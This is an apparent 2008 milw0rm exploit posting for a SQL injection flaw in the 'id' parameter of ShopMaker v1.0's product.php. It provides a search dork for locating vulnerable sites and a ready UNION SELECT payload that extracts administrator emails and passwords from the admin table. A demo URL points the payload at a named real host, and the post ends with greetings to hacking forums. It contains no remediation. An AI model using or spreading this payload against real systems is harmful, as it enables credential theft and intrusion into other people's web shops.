|___________________________________________________| | | ShopMaker v1.0 (product.php id) Remote SQL Injection Vulnerability | |___________________________________________________ |-------------------- Hussin X -------------------| | | Author: Hussin X | | Home : WwW.IQ-ty.CoM | | email: darkangel_g85[at]Yahoo[DoT]com | |___________________________________________________ | | | | script : http://shop.maker.ir | | DorK : "ShopMaker v1.0" |___________________________________________________| Exploit: ________ www.[target].com/Script/product.php?id=-54+union+select+1,concat(email,0x3e,password),3,4+from+admin-- DemO : http://shop.maker.ir/shop/product.php?id=-54+union+select+1,concat(email,0x3e,password),3,4+from+admin-- ____________________________( Greetz )_________________________________ | | All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | | | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | | Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab |_____________________________________________________________________ Im IRAQi | Im TrYaGi # milw0rm.com [2008-10-21]